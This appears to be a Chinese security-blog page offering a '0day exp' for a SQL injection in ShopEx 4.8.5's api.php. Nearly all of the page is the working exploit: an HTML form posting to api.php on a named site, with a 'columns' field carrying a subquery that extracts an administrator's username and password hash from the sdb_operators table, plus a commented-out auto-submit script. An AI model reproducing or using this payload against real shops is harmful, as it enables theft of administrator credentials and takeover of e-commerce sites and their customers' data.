shopex 4.8.5 api.php注入漏洞0day exp

  • A+
所属分类:moonsec_com
<form method='post' action='http://www.sysshell.com/api.php?act=search_dly_type&api_version=1.0'>      columns:<input type='text' value='1,2,(SELECT concat(username,0x7c,userpass) FROM sdb_operators limit 0,1) as name' name='columns' style='width:80%'/><br />      <input type='submit' value='submit' /><br />  </form>  <script>  //document.forms[0].submit()  </script>

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: